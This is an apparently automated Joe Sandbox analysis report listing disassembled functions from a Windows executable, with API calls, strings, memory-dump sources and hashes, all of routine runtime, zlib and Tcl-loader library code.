Instruction Fuzzy Hash: 2D51F731B0D6418EF724BE69948267A6291AF86BB4F1A4634DD6D837CDCF3CE4019720

Function 00007FF64488C134 Relevance: 3.0, APIs: 2, Instructions: 46COMMONLIBRARYCODE

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(?,?,?,?,?,00007FF64488C2CD), ref: 00007FF64488C180
GetLastError.KERNEL32(?,?,?,?,?,00007FF64488C2CD), ref: 00007FF64488C18A

Memory Dump Source

Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 7d52f85de62641260209e8dbb28c5e1251e01e8bf24b4306ce9dcd9badf2c9c6
Instruction ID: e2861e93b0de3ffbced3346885e5fece54c8e8843f6073b18273fff152138241
Opcode Fuzzy Hash: 7d52f85de62641260209e8dbb28c5e1251e01e8bf24b4306ce9dcd9badf2c9c6
Instruction Fuzzy Hash: C311042660CA8185DA20BB25A885169B361BB91FF0F540331EE7D87BDCCF3CD0148700

Function 00007FF64488A948 Relevance: 3.0, APIs: 2, Instructions: 19memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(?,?,?,00007FF644892D22,?,?,?,00007FF644892D5F,?,?,00000000,00007FF644893225,?,?,?,00007FF644893157), ref: 00007FF64488A95E
GetLastError.KERNEL32(?,?,?,00007FF644892D22,?,?,?,00007FF644892D5F,?,?,00000000,00007FF644893225,?,?,?,00007FF644893157), ref: 00007FF64488A968

Memory Dump Source

Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: ErrorFreeHeapLast
String ID:
API String ID: 485612231-0
Opcode ID: 46e6024f15a2f57ad5ff64688e0fe3cec5898f8577aba2f63b046adc8766ef53
Instruction ID: f5ddc91adfb0ba349af405d72a9fbff26ad0d6a50a078a344d395667dc2e0fad
Opcode Fuzzy Hash: 46e6024f15a2f57ad5ff64688e0fe3cec5898f8577aba2f63b046adc8766ef53
Instruction Fuzzy Hash: 92E08C21F0D6428AFF1ABBF2A8C713812916FC8B00F440034DC1DC22AAEE2CE8828310

Function 00007FF64488AB58 Relevance: 2.6, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?,?,?,00007FF64488A9D5,?,?,00000000,00007FF64488AA8A), ref: 00007FF64488ABC6
GetLastError.KERNEL32(?,?,?,00007FF64488A9D5,?,?,00000000,00007FF64488AA8A), ref: 00007FF64488ABD0

Memory Dump Source

Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: CloseErrorHandleLast
String ID:
API String ID: 918212764-0
Opcode ID: ae1e15d82824e1a5fac1c7302ca2ff5641fe0b0e43db7728cd9339717749910c
Instruction ID: 59b189c65cfb96843706c69760e74eb70b7cee45c1406d55c645a375db9775ae
Opcode Fuzzy Hash: ae1e15d82824e1a5fac1c7302ca2ff5641fe0b0e43db7728cd9339717749910c
Instruction Fuzzy Hash: 65219611F1CA8249FA94B75194D637922929FC4BA0F084239DE2EC77DDDF6CE4418300

Function 00007FF64488BEAC Relevance: 1.6, APIs: 1, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF64488BED4

Memory Dump Source

Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 5a303e376ae32d58fd1e52f1ac99a64fdc1cf63549abbe0bdd4da132c2ec767e
Instruction ID: 0b893ed7ea0b77047f18fba12e5c3f55551b9bbfb53913e418721c776a8da696
Opcode Fuzzy Hash: 5a303e376ae32d58fd1e52f1ac99a64fdc1cf63549abbe0bdd4da132c2ec767e
Instruction Fuzzy Hash: 2841A43291C6458BEA24BB19E58227973A0EFD5780F140131EF8EC76DACF6CE402CB51

Function 00007FF644877F90 Relevance: 1.6, APIs: 1, Instructions: 85COMMON

Download Yara Rule

APIs

_fread_nolock.LIBCMT ref: 00007FF64487803A

Memory Dump Source

Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: _fread_nolock
String ID:
API String ID: 840049012-0
Opcode ID: 7026eb3b68f3585a2f5768ea15c5ca7bda34a28a3ae4cdbb6486ed2f903c9d01
Instruction ID: b180facd7e6e6c62b153ad200c8d47848d85e16c0edc9d3332a0e331b2c62582
Opcode Fuzzy Hash: 7026eb3b68f3585a2f5768ea15c5ca7bda34a28a3ae4cdbb6486ed2f903c9d01
Instruction Fuzzy Hash: 0D21C721B1CA564EFE50BB226D963BA9651BF45BC4F8C4430EE0D9778ADE7DE441C310

Function 00007FF64488B93C Relevance: 1.6, APIs: 1, Instructions: 79COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF64488B9C2

Memory Dump Source

Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: c2d01373d3233558d420055387ebca2c39d1ce99b2c1a08127fa32cb0ba5fec2
Instruction ID: f792a154c4f0c818ab992283cc149fc0daed787d2a1d52ccbdc0b672c7175d02
Opcode Fuzzy Hash: c2d01373d3233558d420055387ebca2c39d1ce99b2c1a08127fa32cb0ba5fec2
Instruction Fuzzy Hash: 05313C22A1C65289E652BB55888337C2A90AFC0BA4F911135ED5D873DBEF7CE8858721

Function 00007FF644889961 Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF64488998F

Part of subcall function 00007FF644889A88: GetModuleHandleExW.KERNEL32 ref: 00007FF644889AAD
Part of subcall function 00007FF644889A88: GetProcAddress.KERNEL32 ref: 00007FF644889AC3
Part of subcall function 00007FF644889A88: FreeLibrary.KERNEL32 ref: 00007FF644889AEA

Memory Dump Source

Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: HandleModule$AddressFreeLibraryProc
String ID:
API String ID: 3947729631-0
Opcode ID: 42808d7c08696a35870eb95595f0ae95ff90971c005bfc8769c42bb91e99b0de
Instruction ID: 5d5881feb3f3f24995b23517c4a5e903ca1bdcb2652d3544bbba83f1bddaa9c7
Opcode Fuzzy Hash: 42808d7c08696a35870eb95595f0ae95ff90971c005bfc8769c42bb91e99b0de
Instruction Fuzzy Hash: 85218E72A087468EEB25BF64C4C22EC33A4FB44718F444636DB6D86ADADF38D584CB40

Function 00007FF644885F94 Relevance: 1.6, APIs: 1, Instructions: 55COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF644885EF9

Memory Dump Source

Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
Instruction ID: 96bb4147fc3beb661b4045480d50cd633d694023333b54d5cc802c631a456edf
Opcode Fuzzy Hash: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
Instruction Fuzzy Hash: C0117232E1C6828AEA60BF11948227DA2A4BF85B84F444435EF8CD7ADFDF3DE5008710

Function 00007FF644896354 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF644896377

Memory Dump Source

Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 3765a10cee1e255344ee37f065f4be71d58868c9c9e645b3056c9746d3493235
Instruction ID: d0ee589d1281d71e3a34cff6dd1bc709d7b0c5895c603c0e8665e6d90be33361
Opcode Fuzzy Hash: 3765a10cee1e255344ee37f065f4be71d58868c9c9e645b3056c9746d3493235
Instruction Fuzzy Hash: 4D215032A1CE418ADB61BF18D48237977A0BB84B94F544238EE5E976DDDF3DD4118B00

Function 00007FF6448803BC Relevance: 1.5, APIs: 1, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF644880410

Memory Dump Source

Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
Instruction ID: 1f3d8853ab592a710b04ff31ada186bb604cd8e8fe0a49fecf4c74ac41599cfc
Opcode Fuzzy Hash: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
Instruction Fuzzy Hash: 6E01C461A4C74684EA04FF529982079A691BF86FE4F494631EE5C93BDFCF3CE4018310

Function 00007FF64488EB98 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

HeapAlloc.KERNEL32(?,?,00000000,00007FF64488B32A,?,?,?,00007FF644884F11,?,?,?,?,00007FF64488A48A), ref: 00007FF64488EBED

Memory Dump Source

Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: 0190c006dd090f1dc8136ef035d08a675b61e1fdbed98732a32380f018d60316
Instruction ID: 3cf1118c5be338a9ca19caa8bf08aafb35586c767c7ac40de92f4aa1935e9d03
Opcode Fuzzy Hash: 0190c006dd090f1dc8136ef035d08a675b61e1fdbed98732a32380f018d60316
Instruction Fuzzy Hash: D1F03A64F0D64789FE59776A98D73B912955FD8B80F4C8530CD0FE63DAEE2CE4818220

Function 00007FF64488D5FC Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

HeapAlloc.KERNEL32(?,?,?,00007FF644880C90,?,?,?,00007FF6448822FA,?,?,?,?,?,00007FF644883AE9), ref: 00007FF64488D63A

Memory Dump Source

Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: 510c613edcbd96140e332c46b5608733b20d975e117422ad796dc4540c81bb80
Instruction ID: 0ce46b99c2161101720227423c37da436508429bcf98fc69ee809bc8fab3f170
Opcode Fuzzy Hash: 510c613edcbd96140e332c46b5608733b20d975e117422ad796dc4540c81bb80
Instruction Fuzzy Hash: 4EF0F811F4D24A8DFE65B7B158C367912D15F88BB0F480730DD2EC62CAEE2DE4809690

Non-executed Functions

Function 00007FF6448776C0 Relevance: 177.1, APIs: 66, Strings: 35, Instructions: 314libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 00007FF6448776D7
GetLastError.KERNEL32 ref: 00007FF6448776E9
GetProcAddress.KERNEL32 ref: 00007FF644877725
GetLastError.KERNEL32 ref: 00007FF644877737
GetProcAddress.KERNEL32 ref: 00007FF644877750
GetLastError.KERNEL32 ref: 00007FF644877762
GetProcAddress.KERNEL32 ref: 00007FF64487777B
GetLastError.KERNEL32 ref: 00007FF64487778D
GetProcAddress.KERNEL32 ref: 00007FF6448777A9
GetLastError.KERNEL32 ref: 00007FF6448777BB
GetProcAddress.KERNEL32 ref: 00007FF6448777D7
GetLastError.KERNEL32 ref: 00007FF6448777E9
GetProcAddress.KERNEL32 ref: 00007FF644877805
GetLastError.KERNEL32 ref: 00007FF644877817
GetProcAddress.KERNEL32 ref: 00007FF644877833
GetLastError.KERNEL32 ref: 00007FF644877845
GetProcAddress.KERNEL32 ref: 00007FF644877861
GetLastError.KERNEL32 ref: 00007FF644877873

Strings

Tk_Init, xrefs: 00007FF644877C79, 00007FF644877C9B
Tk_GetNumMainWindows, xrefs: 00007FF644877CA7, 00007FF644877CC9
Tcl_DoOneEvent, xrefs: 00007FF644877771, 00007FF644877793
Tcl_GetCurrentThread, xrefs: 00007FF644877857, 00007FF644877879
Tcl_FinalizeThread, xrefs: 00007FF6448777CD, 00007FF6448777EF
Tcl_NewByteArrayObj, xrefs: 00007FF644877B09, 00007FF644877B2B
Tcl_CreateThread, xrefs: 00007FF644877829, 00007FF64487784B
Tcl_MutexLock, xrefs: 00007FF6448778B3, 00007FF6448778D5
Tcl_CreateObjCommand, xrefs: 00007FF644877A7F, 00007FF644877AA1
Tcl_Finalize, xrefs: 00007FF64487779F, 00007FF6448777C1
Tcl_DeleteInterp, xrefs: 00007FF6448777FB, 00007FF64487781D
Tcl_ConditionFinalize, xrefs: 00007FF64487793D, 00007FF64487795F
Tcl_GetObjResult, xrefs: 00007FF644877B65, 00007FF644877B87
Tcl_ThreadAlert, xrefs: 00007FF6448779F5, 00007FF644877A17
Failed to get address for %hs, xrefs: 00007FF6448776F8
Tcl_EvalFile, xrefs: 00007FF644877B93, 00007FF644877BB5
Tcl_MutexUnlock, xrefs: 00007FF6448778E1, 00007FF644877903
Tcl_SetVar2, xrefs: 00007FF644877A51, 00007FF644877A73
Tcl_Free, xrefs: 00007FF644877C4B, 00007FF644877C6D
Tcl_MutexFinalize, xrefs: 00007FF64487790F, 00007FF644877931
Tcl_Init, xrefs: 00007FF6448776D0, 00007FF6448776EF
Tcl_NewStringObj, xrefs: 00007FF644877ADB, 00007FF644877AFD
Tcl_JoinThread, xrefs: 00007FF644877885, 00007FF6448778A7
Tcl_ConditionWait, xrefs: 00007FF644877999, 00007FF6448779BB
Tcl_ConditionNotify, xrefs: 00007FF64487796B, 00007FF64487798D
Tcl_Alloc, xrefs: 00007FF644877C1D, 00007FF644877C3F
GetProcAddress, xrefs: 00007FF6448776FF
Tcl_ThreadQueueEvent, xrefs: 00007FF6448779C7, 00007FF6448779E9
Tcl_GetVar2, xrefs: 00007FF644877A23, 00007FF644877A45
Tcl_FindExecutable, xrefs: 00007FF644877746, 00007FF644877768
Tcl_EvalEx, xrefs: 00007FF644877BC1, 00007FF644877BE3
Tcl_GetString, xrefs: 00007FF644877AAD, 00007FF644877ACF
Tcl_CreateInterp, xrefs: 00007FF64487771B, 00007FF64487773D
Tcl_SetVar2Ex, xrefs: 00007FF644877B37, 00007FF644877B59
Tcl_EvalObjv, xrefs: 00007FF644877BEF, 00007FF644877C11

Memory Dump Source

Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: AddressErrorLastProc
String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
API String ID: 199729137-3427451314
Opcode ID: 939c8a0ebf27c7f5789cd4a10996167767bc86255d761b2ba34a42bc6fc861e3
Instruction ID: 8e171445b0fa6372433932dfcf8b905ced7772f3c74ceed9d295bd9733f6e47c
Opcode Fuzzy Hash: 939c8a0ebf27c7f5789cd4a10996167767bc86255d761b2ba34a42bc6fc861e3
Instruction Fuzzy Hash: C102A024A0DF47E9FA15FB59A9E25B423A1BF84B85F541031DC2E862ACEF3DF159C204

Function 00007FF6448940AC Relevance: 24.0, APIs: 9, Strings: 4, Instructions: 1226COMMON

Download Yara Rule

APIs

fegetenv.LIBCMT ref: 00007FF6448940FA
_invalid_parameter_noinfo.LIBCMT ref: 00007FF644894766
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6448948DC
_invalid_parameter_noinfo.LIBCMT ref: 00007FF644894B9A
_invalid_parameter_noinfo.LIBCMT ref: 00007FF644894DBA
_invalid_parameter_noinfo.LIBCMT ref: 00007FF644894FF7
memcpy_s.LIBCPMT ref: 00007FF6448950D2
memcpy_s.LIBCPMT ref: 00007FF64489517D
memcpy_s.LIBCPMT ref: 00007FF64489524C

Strings

1#INF, xrefs: 00007FF644894223
1#SNAN, xrefs: 00007FF64489420A
1#QNAN, xrefs: 00007FF644894213
1#IND, xrefs: 00007FF6448941E7

Memory Dump Source

Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 808467561-2761157908
Opcode ID: 7da0388417e7c773b0aab48e07e342724827a26e5879d16e5decf6c79e081c8c
Instruction ID: a51563dc12837f38319fae3827ac8aa499cbbc6cb9a2171b36941a117f7cc576
Opcode Fuzzy Hash: 7da0388417e7c773b0aab48e07e342724827a26e5879d16e5decf6c79e081c8c
Instruction Fuzzy Hash: C9B2C172A1CA82CEE765AE64D4827FD37A1FB54788F505135DE0A97A8CDF39E900CB40

Function 00007FF64487ACAD Relevance: 12.0, Strings: 9, Instructions: 744COMMON

Download Yara Rule

Strings

invalid code -- missing end-of-block, xrefs: 00007FF64487B0C6
invalid distance code, xrefs: 00007FF64487B5B4
invalid distance too far back, xrefs: 00007FF64487B670
invalid distances set, xrefs: 00007FF64487B1A0
invalid code lengths set, xrefs: 00007FF64487AE2D
invalid literal/lengths set, xrefs: 00007FF64487B133
invalid bit length repeat, xrefs: 00007FF64487B099
too many length or distance symbols, xrefs: 00007FF64487AE46
invalid literal/length code, xrefs: 00007FF64487B3E2

Memory Dump Source

Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID:
String ID: invalid bit length repeat$invalid code -- missing end-of-block$invalid code lengths set$invalid distance code$invalid distance too far back$invalid distances set$invalid literal/length code$invalid literal/lengths set$too many length or distance symbols
API String ID: 0-2665694366
Opcode ID: 14409f6b5173d9f28888b9fb9c68bcc2b54b8e7def706e6c40ef53002486e1ba
Instruction ID: a657645c5a88702c3075fc006201d35c58289ec35ab43038213e7171f7556dd6
Opcode Fuzzy Hash: 14409f6b5173d9f28888b9fb9c68bcc2b54b8e7def706e6c40ef53002486e1ba
Instruction Fuzzy Hash: BF52C576B1C6A54BD794BF14C8A9B7E3BAAFB84344F014139EA4A87784DF39D844CB40

Function 00007FF64487D12C Relevance: 10.6, APIs: 7, Instructions: 71COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00007FF64487D148
RtlCaptureContext.KERNEL32 ref: 00007FF64487D175
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF64487D18F
RtlVirtualUnwind.KERNEL32 ref: 00007FF64487D1D0
IsDebuggerPresent.KERNEL32 ref: 00007FF64487D224
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF64487D241
UnhandledExceptionFilter.KERNEL32 ref: 00007FF64487D24C

Memory Dump Source

Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

